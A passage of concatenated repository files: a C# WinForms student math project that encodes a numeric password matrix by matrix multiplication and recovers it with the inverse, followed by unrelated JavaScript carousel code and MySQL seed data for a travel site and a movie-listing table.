" " + Senha_Inversa[2, 0].ToString() + " " + Senha_Inversa[2, 1].ToString() + " " + Senha_Inversa[2, 2].ToString();
// MATRIZ DESCRIPTOGRAFIA: é uma multiplicação entre a MATRIZ MESTRE e a MATRIZ INVERSA, resultando na MATRIZ SENHA
float[] Elementos =
{
// Linha 1
(Senha_Mestre[0,0] * Senha_Inversa[0,0]) + (Senha_Mestre[0,1] * Senha_Inversa[1,0]) + (Senha_Mestre[0,2] * Senha_Inversa[2,0]) , // Coluna 1
(Senha_Mestre[0,0] * Senha_Inversa[0,1]) + (Senha_Mestre[0,1] * Senha_Inversa[1,1]) + (Senha_Mestre[0,2] * Senha_Inversa[2,1]) , // Coluna 2
(Senha_Mestre[0,0] * Senha_Inversa[0,2]) + (Senha_Mestre[0,1] * Senha_Inversa[1,2]) + (Senha_Mestre[0,2] * Senha_Inversa[2,2]) , // Coluna 3
// Linha 2
(Senha_Mestre[1,0] * Senha_Inversa[0,0]) + (Senha_Mestre[1,1] * Senha_Inversa[1,0]) + (Senha_Mestre[1,2] * Senha_Inversa[2,0]) , // Coluna 1
(Senha_Mestre[1,0] * Senha_Inversa[0,1]) + (Senha_Mestre[1,1] * Senha_Inversa[1,1]) + (Senha_Mestre[1,2] * Senha_Inversa[2,1]) , // Coluna 2
(Senha_Mestre[1,0] * Senha_Inversa[0,2]) + (Senha_Mestre[1,1] * Senha_Inversa[1,2]) + (Senha_Mestre[1,2] * Senha_Inversa[2,2]) , // Coluna 3
// Linha 3
(Senha_Mestre[2,0] * Senha_Inversa[0,0]) + (Senha_Mestre[2,1] * Senha_Inversa[1,0]) + (Senha_Mestre[2,2] * Senha_Inversa[2,0]) , // Coluna 1
(Senha_Mestre[2,0] * Senha_Inversa[0,1]) + (Senha_Mestre[2,1] * Senha_Inversa[1,1]) + (Senha_Mestre[2,2] * Senha_Inversa[2,1]) , // Coluna 2
(Senha_Mestre[2,0] * Senha_Inversa[0,2]) + (Senha_Mestre[2,1] * Senha_Inversa[1,2]) + (Senha_Mestre[2,2] * Senha_Inversa[2,2]) // Coluna 3
};
float[,] Descriptografar =
{
// Coluna 1 // Coluna 2 // Coluna 3
{ Elementos[0], Elementos[1], Elementos[2] }, // Linha 1
{ Elementos[3], Elementos[4], Elementos[5] }, // Linha 2
{ Elementos[6], Elementos[7], Elementos[8] } // Linha 3
};
Senha_Descriptografia = Descriptografar;
txtSenhaDescriptografia.Text = Math.Round(Senha_Descriptografia[0, 0], 0).ToString() + " " + Math.Round(Senha_Descriptografia[0, 1], 0).ToString() + " " + Math.Round(Senha_Descriptografia[0, 2], 0).ToString() +
" " + Math.Round(Senha_Descriptografia[1, 0], 0).ToString() + " " + Math.Round(Senha_Descriptografia[1, 1], 0).ToString() + " " + Math.Round(Senha_Descriptografia[1, 2], 0).ToString() +
" " + Math.Round(Senha_Descriptografia[2, 0], 0).ToString() + " " + Math.Round(Senha_Descriptografia[2, 1], 0).ToString() + " " + Math.Round(Senha_Descriptografia[2, 2], 0).ToString();
btnZerar.Focus();
}
private void btnZerar_Click(object sender, EventArgs e)
{
Zerar_Tudo();
}
// As instâncias abaixo têm como função fazer as validações do sistema, tais como: limpezas de campos, selecionar textos, gerar números randômicos.
// Estas rotinas não influenciam diretamente no funcionamento do sistema, servindo apenas como uma base de organização.
public void Zerar_Tudo()
{
for (int l = 0; l <= 2; l++)
{
for (int c = 0; c <= 2; c++)
{
String Nome = "txtSenha" + l + "x" + c;
TextBox txtSenha = this.Controls.Find(Nome, true).FirstOrDefault() as TextBox;
txtSenha.Clear();
}
}
Senha_Comum = null;
Senha_Criptografia = null;
Senha_Mestre = null;
Senha_Cofatora = null;
Senha_Transposta = null;
Senha_Inversa = null;
Senha_Descriptografia = null;
txtSenhaMestre.Clear();
txtSenhaCriptografia.Clear();
txtSenhaCofatora.Clear();
txtSenhaTransposta.Clear();
txtSenhaInversa.Clear();
txtSenhaDescriptografia.Clear();
btnCofatorar.Enabled = false;
btnDescriptografar.Enabled = false;
txtSenha0x0.Focus();
}
public void Zerar_Parcial()
{
Senha_Cofatora = null;
Senha_Inversa = null;
Senha_Descriptografia = null;
txtSenhaCofatora.Clear();
txtSenhaInversa.Clear();
txtSenhaDescriptografia.Clear();
btnCofatorar.Enabled = false;
btnDescriptografar.Enabled = false;
}
private void txtSenha0x0_KeyPress(object sender, KeyPressEventArgs e)
{
Zerar_Parcial();
if (!Char.IsDigit(e.KeyChar) && e.KeyChar != (char)8)
{
e.Handled = true;
}
}
private void txtSenha0x0_Enter(object sender, EventArgs e)
{
txtSenha0x0.SelectAll();
}
private void txtSenha0x1_Enter(object sender, EventArgs e)
{
txtSenha0x1.SelectAll();
}
private void txtSenha0x2_Enter(object sender, EventArgs e)
{
txtSenha0x2.SelectAll();
}
private void txtSenha1x0_Enter(object sender, EventArgs e)
{
txtSenha1x0.SelectAll();
}
private void txtSenha1x1_Enter(object sender, EventArgs e)
{
txtSenha1x1.SelectAll();
}
private void txtSenha1x2_Enter(object sender, EventArgs e)
{
txtSenha1x2.SelectAll();
}
private void txtSenha2x0_Enter(object sender, EventArgs e)
{
txtSenha2x0.SelectAll();
}
private void txtSenha2x1_Enter(object sender, EventArgs e)
{
txtSenha2x1.SelectAll();
}
private void txtSenha2x2_Enter(object sender, EventArgs e)
{
txtSenha2x2.SelectAll();
}
private void txtSenhaMestre_Click(object sender, EventArgs e)
{
if (txtSenhaMestre.Text != "")
{
MessageBox.Show
(
Senha_Mestre[0, 0].ToString() + "\t" + Senha_Mestre[0, 1].ToString() + "\t" + Senha_Mestre[0, 2].ToString() + "\n" +
Senha_Mestre[1, 0].ToString() + "\t" + Senha_Mestre[1, 1].ToString() + "\t" + Senha_Mestre[1, 2].ToString() + "\n" +
Senha_Mestre[2, 0].ToString() + "\t" + Senha_Mestre[2, 1].ToString() + "\t" + Senha_Mestre[2, 2].ToString(), "Senha Mestre"
);
}
}
private void txtSenhaCriptografia_Click(object sender, EventArgs e)
{
if (txtSenhaCriptografia.Text != "")
{
MessageBox.Show
(
Senha_Criptografia[0, 0].ToString() + "\t" + Senha_Criptografia[0, 1].ToString() + "\t" + Senha_Criptografia[0, 2].ToString() + "\n" +
Senha_Criptografia[1, 0].ToString() + "\t" + Senha_Criptografia[1, 1].ToString() + "\t" + Senha_Criptografia[1, 2].ToString() + "\n" +
Senha_Criptografia[2, 0].ToString() + "\t" + Senha_Criptografia[2, 1].ToString() + "\t" + Senha_Criptografia[2, 2].ToString(), "Senha Criptografia"
);
}
}
private void txtMatrizTransposta_Click(object sender, EventArgs e)
{
if (txtSenhaTransposta.Text != "")
{
MessageBox.Show
(
Senha_Transposta[0, 0].ToString() + "\t" + Senha_Transposta[0, 1].ToString() + "\t" + Senha_Transposta[0, 2].ToString() + "\n" +
Senha_Transposta[1, 0].ToString() + "\t" + Senha_Transposta[1, 1].ToString() + "\t" + Senha_Transposta[1, 2].ToString() + "\n" +
Senha_Transposta[2, 0].ToString() + "\t" + Senha_Transposta[2, 1].ToString() + "\t" + Senha_Transposta[2, 2].ToString(), "Senha Transposta"
);
}
}
private void txtSenhaCofatora_Click(object sender, EventArgs e)
{
if (txtSenhaCofatora.Text != "")
{
MessageBox.Show
(
Senha_Cofatora[0, 0].ToString() + "\t" + Senha_Cofatora[0, 1].ToString() + "\t" + Senha_Cofatora[0, 2].ToString() + "\n" +
Senha_Cofatora[1, 0].ToString() + "\t" + Senha_Cofatora[1, 1].ToString() + "\t" + Senha_Cofatora[1, 2].ToString() + "\n" +
Senha_Cofatora[2, 0].ToString() + "\t" + Senha_Cofatora[2, 1].ToString() + "\t" + Senha_Cofatora[2, 2].ToString(), "Senha Cofatora"
);
}
}
private void txtSenhaInversa_Click(object sender, EventArgs e)
{
if (txtSenhaInversa.Text != "")
{
MessageBox.Show
(
Senha_Inversa[0, 0].ToString() + "\t" + Senha_Inversa[0, 1].ToString() + "\t" + Senha_Inversa[0, 2].ToString() + "\n" +
Senha_Inversa[1, 0].ToString() + "\t" + Senha_Inversa[1, 1].ToString() + "\t" + Senha_Inversa[1, 2].ToString() + "\n" +
Senha_Inversa[2, 0].ToString() + "\t" + Senha_Inversa[2, 1].ToString() + "\t" + Senha_Inversa[2, 2].ToString(), "Senha Inversa"
);
}
}
private void txtSenhaDescriptografia_Click(object sender, EventArgs e)
{
if (txtSenhaDescriptografia.Text != "")
{
MessageBox.Show
(
Math.Round(Senha_Descriptografia[0, 0], 0).ToString() + "\t" + Math.Round(Senha_Descriptografia[0, 1], 0).ToString() + "\t" + Math.Round(Senha_Descriptografia[0, 2], 0).ToString() + "\n" +
Math.Round(Senha_Descriptografia[1, 0], 0).ToString() + "\t" + Math.Round(Senha_Descriptografia[1, 1], 0).ToString() + "\t" + Math.Round(Senha_Descriptografia[1, 2], 0).ToString() + "\n" +
Math.Round(Senha_Descriptografia[2, 0], 0).ToString() + "\t" + Math.Round(Senha_Descriptografia[2, 1], 0).ToString() + "\t" + Math.Round(Senha_Descriptografia[2, 2], 0).ToString(), "Senha Descriptografia"
);
}
}
private void btnRandom_Click(object sender, EventArgs e)
{
Zerar_Parcial();
Random Randômico = new Random();
for (int l = 0; l <= 2; l++)
{
for (int c = 0; c <= 2; c++)
{
String Nome = "txtSenha" + l + "x" + c;
TextBox txtSenha = this.Controls.Find(Nome, true).FirstOrDefault() as TextBox;
txtSenha.Text = Randômico.Next(0, 9999).ToString();
}
btnCriptografar.Focus();
}
}
}
}
<file_sep># MathSharp (2017)
Projeto prático utilizado como método de avaliação final da disciplina Matemática, sendo esta lecionada pelo Prof.º <NAME> no Instituto Federal de São Paulo, Câmpus Hortolândia.
<file_sep>using System;
using System.Linq;
using System.Windows.Forms;
namespace MathSharp
{
public partial class frmOrdemDois : Form
{
public frmOrdemDois()
{
InitializeComponent();
}
public static float[,] Senha_Comum; // MATRIZ SENHA (informada pelo usuário)
public static float[,] Senha_Criptografia; // MATRIZ CRIPTOGRAFIA (matriz auxiliar formada pela multiplicação dos elementos da MATRIZ SENHA)
public static float[,] Senha_Mestre; // MATRIZ MESTRE (multiplicação entre a MATRIZ SENHA x MATRIZ CRIPTOGRAFIA)
public static float[,] Senha_Inversa; // MATRIZ INVERSA (inversa da MATRIZ CRIPTOGRAFIA)
public static float[,] Senha_Descriptografia; // MATRIZ DESCRIPTOGRAFIA (multiplicação da MATRIZ MESTRE x MATRIZ INVERSA = MATRIZ SENHA)
private void frmOrdemDois_FormClosed(object sender, FormClosedEventArgs e)
{
frmPrincipal Principal = new frmPrincipal();
Principal.Show();
this.Hide();
}
private void btnCriptografar_Click(object sender, EventArgs e)
{
try
{
// MATRIZ SENHA: é uma matriz de ordem dois, na qual o usuário deve informar seus valores.
// Esta matriz tem apenas como regra o limite de seus elementos, limitada a números inteiros positivos não superiores a 9999.
float[,] Senha = { { 0, 0 }, { 0, 0 } };
for (int l = 0; l <= 1; l++)
{
for (int c = 0; c <= 1; c++)
{
String Nome = "txtSenha" + l + "x" + c;
TextBox txtSenha = this.Controls.Find(Nome, true).FirstOrDefault() as TextBox;
Senha[l, c] = float.Parse(txtSenha.Text);
}
}
Senha_Comum = Senha;
// Determinante da MATRIZ SENHA (se o determinante for igual a 0, por definição sua inversa é inexistente)
float Determinante;
Determinante = (Senha_Comum[0, 0] * Senha_Comum[1, 1]) - (Senha_Comum[1, 0] * Senha_Comum[0, 1]);
if (Determinante == 0)
{
MessageBox.Show("Não foi possível criptografar a senha.\nA matriz senha comum tem zero como determinante.", "Aviso", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
Zerar_Tudo();
}
else
{
// MATRIZ CRIPTOGRAFIA: é uma matriz auxiliar que será multiplicada pela MATRIZ COMUM.
// Esta matriz é formada por meio de uma multiplicação (baseada na regra abaixo) com os elementos da MATRIZ SENHA:
// - [Senha(L0C0) x 73] (73 em decimal = I)
// - [Senha(L0C1) x 70] (70 em decimal = F)
// - [Senha(L1C0) x 83] (83 em decimal = S)
// - [Senha(L1C1) x 80] (80 em decimal = P)
float[,] Criptografia = {
// Coluna 1 // Coluna 2
{ Senha[0, 0] * 73, Senha[0, 1] * 70 } , // Linha 1
// Coluna 1 // Coluna 2
{ Senha[1, 0] * 83, Senha[1, 1] * 80 } // Linha 2
};
Senha_Criptografia = Criptografia;
txtSenhaCriptografia.Text = Senha_Criptografia[0, 0].ToString() + " " + Senha_Criptografia[0, 1].ToString() + " " + Senha_Criptografia[1, 0].ToString() + " " + Senha_Criptografia[1, 1].ToString();
// MATRIZ MESTRE: é uma matriz gerada a partir da multiplicação da MATRIZ CRIPTOGRAFIA com a MATRIZ COMUM.
float[,] Mestre =
{
// LINHA 0
{
(Senha_Comum[0, 0] * Senha_Criptografia[0, 0]) + (Senha_Comum[0, 1] * Senha_Criptografia[1, 0]) , // COLUNA 0
(Senha_Comum[0, 0] * Senha_Criptografia[0, 1]) + (Senha_Comum[0, 1] * Senha_Criptografia[1, 1]) // COLUNA 1
} ,
// LINHA 1
{
(Senha_Comum[1, 0] * Senha_Criptografia[0, 0]) + (Senha_Comum[1, 1] * Senha_Criptografia[1, 0]) , // COLUNA 0
(Senha_Comum[1, 0] * Senha_Criptografia[0, 1]) + (Senha_Comum[1, 1] * Senha_Criptografia[1, 1]) // COLUNA 1
}
};
Senha_Mestre = Mestre;
txtSenhaMestre.Text = Senha_Mestre[0, 0].ToString() + " " + Senha_Mestre[0, 1].ToString() + " " + Senha_Mestre[1, 0].ToString() + " " + Senha_Mestre[1, 1].ToString();
Zerar_Parcial();
btnDescriptografar.Enabled = true;
btnDescriptografar.Focus();
}
}
catch
{
MessageBox.Show("Dados inválidos, favor digitar novamente.", "Aviso", MessageBoxButtons.OK, MessageBoxIcon.Error);
Zerar_Tudo();
}
}
private void btnDescriptografar_Click(object sender, EventArgs e)
{
// Determinante da MATRIZ CRIPTOGRAFIA (se o determinante for igual a 0, por definição sua inversa é inexistente)
float Determinante;
Determinante = (Senha_Criptografia[0, 0] * Senha_Criptografia[1, 1]) - (Senha_Criptografia[1, 0] * Senha_Criptografia[0, 1]);
if (Determinante == 0)
{
MessageBox.Show("Não foi possível descriptografar a senha.\nA matriz criptografia tem zero como determinante.", "Aviso", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
Zerar_Tudo();
}
else
{
// MATRIZ INVERSA: é a matriz inversa formada a partir da MATRIZ CRIPTOGRAFIA (regra exclusiva para matrizes de ordem 2)
float[,] Inversa = { // Coluna 1 // Coluna 2
{ Senha_Criptografia[1, 1] , -Senha_Criptografia[0, 1] } , // Linha 1
// Coluna 1 // Coluna 2
{ -Senha_Criptografia[1, 0] , Senha_Criptografia[0, 0] } // Linha 2
};
Senha_Inversa = Inversa;
txtSenhaInversa.Text = Senha_Inversa[0, 0].ToString() + " " + Senha_Inversa[0, 1].ToString() + " " + Senha_Inversa[1, 0].ToString() + " " + Senha_Inversa[1, 1].ToString();
// MATRIZ DESCRIPTOGRAFIA: é uma multiplicação entre a MATRIZ MESTRE e a MATRIZ INVERSA, resultando na MATRIZ SENHA
float[,] Descriptografia =
{
// LINHA 0
{
(Senha_Mestre[0, 0] * (Senha_Inversa[0, 0] / Determinante)) + (Senha_Mestre[0, 1] * (Senha_Inversa[1, 0] / Determinante)) , // COLUNA 0
(Senha_Mestre[0, 0] * (Senha_Inversa[0, 1] / Determinante)) + (Senha_Mestre[0, 1] * (Senha_Inversa[1, 1] / Determinante)) // COLUNA 1
} ,
// LINHA 1
{
(Senha_Mestre[1, 0] * (Senha_Inversa[0, 0] / Determinante)) + (Senha_Mestre[1, 1] * (Senha_Inversa[1, 0] / Determinante)) , // COLUNA 0
(Senha_Mestre[1, 0] * (Senha_Inversa[0, 1] / Determinante)) + (Senha_Mestre[1, 1] * (Senha_Inversa[1, 1] / Determinante)) // COLUNA 1
}
};
Senha_Descriptografia = Descriptografia;
txtSenhaDescriptografia.Text = Math.Round(Senha_Descriptografia[0, 0], 0).ToString() + " " + Math.Round(Senha_Descriptografia[0, 1], 0).ToString() + " " + Math.Round(Senha_Descriptografia[1, 0], 0).ToString() + " " + Math.Round(Senha_Descriptografia[1, 1], 0).ToString();
btnZerar.Focus();
}
}
private void btnZerar_Click(object sender, EventArgs e)
{
Zerar_Tudo();
}
// As instâncias abaixo tem como função fazer as validações do sistema, tais como: limpezas de campos, selecionar textos, gerar números randômicos.
// Estas rotinas não influenciam diretamente no funcionamento do sistema, servindo apenas como uma base de organização.
public void Zerar_Tudo()
{
for (int l = 0; l <= 1; l++)
{
for (int c = 0; c <= 1; c++)
{
String Nome = "txtSenha" + l + "x" + c;
TextBox txtSenha = this.Controls.Find(Nome, true).FirstOrDefault() as TextBox;
txtSenha.Clear();
}
}
Senha_Comum = null;
Senha_Criptografia = null;
Senha_Mestre = null;
Senha_Inversa = null;
Senha_Descriptografia = null;
txtSenhaMestre.Clear();
txtSenhaCriptografia.Clear();
txtSenhaInversa.Clear();
txtSenhaDescriptografia.Clear();
btnDescriptografar.Enabled = false;
txtSenha0x0.Focus();
}
public void Zerar_Parcial()
{
txtSenhaInversa.Clear();
txtSenhaDescriptografia.Clear();
Senha_Inversa = null;
Senha_Descriptografia = null;
btnDescriptografar.Enabled = false;
}
private void txtSenha0x0_Enter(object sender, EventArgs e)
{
txtSenha0x0.SelectAll();
}
private void txtSenha0x1_Enter(object sender, EventArgs e)
{
txtSenha0x1.SelectAll();
}
private void txtSenha1x0_Enter(object sender, EventArgs e)
{
txtSenha1x0.SelectAll();
}
private void txtSenha1x1_Enter(object sender, EventArgs e)
{
txtSenha1x1.SelectAll();
}
private void txtSenha0x0_KeyPress(object sender, KeyPressEventArgs e)
{
Zerar_Parcial();
if (!Char.IsDigit(e.KeyChar) && e.KeyChar != (char)8)
{
e.Handled = true;
}
}
private void txtSenhaMestre_Click(object sender, EventArgs e)
{
if (txtSenhaMestre.Text != "")
{
MessageBox.Show
(
Senha_Mestre[0, 0].ToString() + "\t" + Senha_Mestre[0, 1].ToString() + "\n" +
Senha_Mestre[1, 0].ToString() + "\t" + Senha_Mestre[1, 1].ToString(), "Senha Mestre"
);
}
}
private void txtSenhaCriptografia_Click(object sender, EventArgs e)
{
if (txtSenhaCriptografia.Text != "")
{
MessageBox.Show
(
Senha_Criptografia[0, 0].ToString() + "\t" + Senha_Criptografia[0, 1].ToString() + "\n" +
Senha_Criptografia[1, 0].ToString() + "\t" + Senha_Criptografia[1, 1].ToString(), "Senha Criptografia"
);
}
}
private void txtSenhaInversa_Click(object sender, EventArgs e)
{
if (txtSenhaInversa.Text != "")
{
MessageBox.Show
(
Senha_Inversa[0, 0].ToString() + "\t" + Senha_Inversa[0, 1].ToString() + "\n" +
Senha_Inversa[1, 0].ToString() + "\t" + Senha_Inversa[1, 1].ToString(), "Senha Inversa"
);
}
}
private void txtSenhaDescriptografia_Click(object sender, EventArgs e)
{
if (txtSenhaDescriptografia.Text != "")
{
MessageBox.Show
(
Math.Round(Senha_Descriptografia[0, 0], 0).ToString() + "\t" + Math.Round(Senha_Descriptografia[0, 1], 0).ToString() + "\n" +
Math.Round(Senha_Descriptografia[1, 0], 0).ToString() + "\t" + Math.Round(Senha_Descriptografia[1, 1], 0).ToString(), "Senha Descriptografia"
);
}
}
private void btnRandom_Click(object sender, EventArgs e)
{
Zerar_Parcial();
Random Randômico = new Random();
for (int l = 0; l <= 1; l++)
{
for (int c = 0; c <= 1; c++)
{
String Nome = "txtSenha" + l + "x" + c;
TextBox txtSenha = this.Controls.Find(Nome, true).FirstOrDefault() as TextBox;
txtSenha.Text = Randômico.Next(0, 9999).ToString();
}
btnCriptografar.Focus();
}
}
}
}
|
b2c182827d9933de53e21cdabd498852f554417d
|
[
"Markdown",
"C#"
] | 4 |
C#
|
dumasmcarvalho/Y2017_MathSharp
|
71572bb2651486b2f8fb47f0685b28b1cd3bc670
|
7dfa40b3c4d18445face0d6826bc1d12e0d5c427
|
refs/heads/master
|
<file_sep>(function(){
var num = 0;
timer=setInterval(function(){
num++;
if(num>$('#index_d1>div:first-child>a>img').length-1){
num=0;
$('#index_d1>div:first-child').animate({marginLeft:-1430*num})
}else{
$('#index_d1>div:first-child').animate({marginLeft:-1430*num})
}
},3000)
})()<file_sep>SET FOREIGN_KEY_CHECKS=0;
-- ----------------------------
-- Table structure for `xc_index_carousel`
-- ----------------------------
DROP TABLE IF EXISTS `xc_index_carousel`;
CREATE TABLE `xc_index_carousel` (
`cid` int(11) NOT NULL auto_increment,
`img` varchar(128) default NULL,
`title` varchar(64) default NULL,
`href` varchar(128) default NULL,
PRIMARY KEY (`cid`)
) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=utf8;
-- ----------------------------
-- Records of xc_index_carousel
-- ----------------------------
INSERT INTO `xc_index_carousel` VALUES ('1', 'img/70040v000000k11t696C6_1920_340_17.jpg', '轮播广告商品1', 'product_details.html?lid=28');
INSERT INTO `xc_index_carousel` VALUES ('2', 'img/70040w000000k5y3d6A18_1920_340_17.jpg', '轮播广告商品2', 'product_details.html?lid=19');
INSERT INTO `xc_index_carousel` VALUES ('3', 'img/70040v000000jvq6yA508_1920_340_17.jpg', '轮播广告商品3', 'lookforward.html');
INSERT INTO `xc_index_carousel` VALUES ('4', 'img/700w0v000000k9hpp3E43_1920_340_17.jpg', '轮播广告商品4', 'lookforward.html');
INSERT INTO `xc_index_carousel` VALUES ('5', 'img/700q0v000000k44t77928_1920_340_17.jpg', '轮播广告商品4', 'lookforward.html');
INSERT INTO `xc_index_carousel` VALUES ('6', 'img/700j0v000000jwodp64EA_1920_340_17.jpg', '轮播广告商品4', 'lookforward.html');
INSERT INTO `xc_index_carousel` VALUES ('7', 'img/700h0v000000k57dd85B7_1920_340_17.jpg', '轮播广告商品4', 'lookforward.html');
INSERT INTO `xc_index_carousel` VALUES ('8', 'img/700b0w000000k87556D5A_1920_340_17.jpg', '轮播广告商品4', 'lookforward.html');
-- ----------------------------
-- Table structure for `xc_index_lvyou`
-- ----------------------------
DROP TABLE IF EXISTS `xc_index_lvYou`;
CREATE TABLE `xc_index_product` (
`pid` int(11) NOT NULL auto_increment,
`title` varchar(64) default NULL,
`details` varchar(128) default NULL,
`pic` varchar(128) default NULL,
`xiwei` varchar(12) default NULL,
`price` decimal(10,2) default NULL,
`href` varchar(128) default NULL,
PRIMARY KEY (`pid`)
) ENGINE=InnoDB AUTO_INCREMENT=15 DEFAULT CHARSET=utf8;
-- ----------------------------
-- Records of xc_index_product
-- ----------------------------
INSERT INTO `xc_index_product` VALUES ('1', '自由行销售明星!早订+多人享惠', '三亚5日自由行(5钻)·【销售明星款..', 'img/300e0v000000k3izh1B48_C_500_280.jpg', '席位充足', '1646','1');
INSERT INTO `xc_index_product` VALUES ('2', '热卖爆款', '沙巴6日4晚自由行.【APP领券更优惠...', 'img/300c0h0000008rtxq3F6B_C_500_280.jpg', '席位充足', '2048','1');
INSERT INTO `xc_index_product` VALUES ('3', '马代五星岛屿特价放松,一家全包,密..', '马尔代夫吉哈Kihaa7日5晚自由行(5...',
'img/100j0k000000bdfzyAC5C_C_500_280.jpg', '席位充足', '6996','1');
INSERT INTO `xc_index_product` VALUES ('4', '森林庄园风格,威斯汀让你感受到一丝..', '兰卡威+吉隆坡7日6晚自由行·【国庆', 'img/100u0k000000bazls1A59_C_500_280.jpg', '席位充足', '4705','1');
-- ----------------------------
-- Table structure for `xc_user`
-- ----------------------------
DROP TABLE IF EXISTS `xc_user`;
CREATE TABLE `xc_user` (
`uid` int(11) NOT NULL auto_increment,
`uname` varchar(32) default NULL,
`upwd` varchar(32) default NULL,
`email` varchar(64) default NULL,
`phone` varchar(16) default NULL,
`avatar` varchar(128) default NULL,
`user_name` varchar(32) default NULL,
`gender` int(11) default NULL,
PRIMARY KEY (`uid`)
) ENGINE=InnoDB AUTO_INCREMENT=91 DEFAULT CHARSET=utf8;
-- ----------------------------
-- Records of xc_user
-- ----------------------------
INSERT INTO `xc_user` VALUES ('1', 'dingding', '123456', '<EMAIL>', '13511011000', 'img/avatar/default.png', '丁春秋', '0');
INSERT INTO `xc_user` VALUES ('2', 'dangdang', '123456', '<EMAIL>', '13501234568', 'img/avatar/default.png', '当当喵', '1');
INSERT INTO `xc_user` VALUES ('3', 'doudou', '123456', '<EMAIL>', '13501234569', 'img/avatar/default.png', '窦志强', '1');
INSERT INTO `xc_user` VALUES ('4', 'yaya', '123456', '<EMAIL>', '13501234560', 'img/avatar/default.png', '秦小雅', '0');
INSERT INTO `xc_user` VALUES ('5', '1111', '111111', '<EMAIL>', '18357100796', null, null, null);
INSERT INTO `xc_user` VALUES ('6', 'ABCD', '123456', '<EMAIL>', '13538894495', null, null, null);
INSERT INTO `xc_user` VALUES ('7', 'mohk', '123456', '<EMAIL>', '13512312312', null, null, null);
INSERT INTO `xc_user` VALUES ('8', '121123', 'w13945128995', '<EMAIL>', '13213389258', null, null, null);
INSERT INTO `xc_user` VALUES ('9', '555555', '5555555', '<EMAIL>', '13400000000', null, null, null);
INSERT INTO `xc_user` VALUES ('10', 'xuyong', '123456', '<EMAIL>', '15525623622', null, null, null);
INSERT INTO `xc_user` VALUES ('11', 'admin', 'cxy930123', '<EMAIL>', '13580510164', null, null, null);
INSERT INTO `xc_user` VALUES ('12', 'siyongbo', '900427', '<EMAIL>', '18447103998', null, null, null);
INSERT INTO `xc_user` VALUES ('13', 'qwerty', '123456', '<EMAIL>', '15617152367', null, null, null);
INSERT INTO `xc_user` VALUES ('14', 'dingziqiang', '456456', '<EMAIL>', '15567502520', null, null, null);
<file_sep>(async function(){
var res=await ajax({
url:"http://localhost:4000/index/",
type:"get",
dataType:"json"
});
var carousel= res.carousel;
new Vue({
el:"#index_d1>div:first-child",
data:{
carousel
}
})
var product = res.product;
new Vue({
el:"#tanx",
data:{
product
}
})
console.log(res);
})()<file_sep>#设置客户端语言
SET NAMES UTF8;
#放弃数据库(如果存在)豆瓣
DROP DATABASE IF EXISTS bean;
#创建数据库 bean 豆瓣
CREATE DATABASE bean charset=utf8;
USE bean;
#第一列 最新上映 recent
CREATE TABLE bean_recent(
id INT PRIMARY KEY AUTO_INCREMENT,
img_url VARCHAR(128),
title VARCHAR(64),
score FLOAT
);
#插入数据
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537399580.jpg",
"铁血战士",5.1
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537214991.jpg",
"胡桃夹子和四个王国",6.1
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2538070121.jpg",
"八仙",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2538555285.jpg",
"滴答屋",5.5
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535524955.jpg",
"流浪猫鲍勃",8.0
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537133715.jpg",
"冰封侠:时空行者",5.1
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535096871.jpg",
"无双",8.1
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2535550507.jpg",
"雪怪大冒险",7.6
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535365481.jpg",
"嗝嗝老师",7.5
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2533173724.jpg",
"昨日青空",6.1
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2534471408.jpg",
"找到你",7.4
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537871355.jpg",
"黑暗迷宫",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2530513100.jpg",
"影",7.4
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537392122.jpg",
"你美丽了我的人生",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535257594.jpg",
"阿拉姜色",7.6
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2538058163.jpg",
"阴阳眼之瞳灵公馆",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2533384240.jpg",
"李茶的姑妈",5.0
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2533822396.jpg",
"我的间谍前男友",6.3
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2536748718.jpg",
"帝企鹅日记2:召唤",7.2
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537061691.jpg",
"功夫联盟",3.6
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537238752.jpg",
"追鹰日记",7.3
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537032871.jpg",
"无敌原始人",6.3
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535445813.jpg",
"玛雅蜜蜂历险记",6.6
);
INSERT INTO bean_recent VALUES(
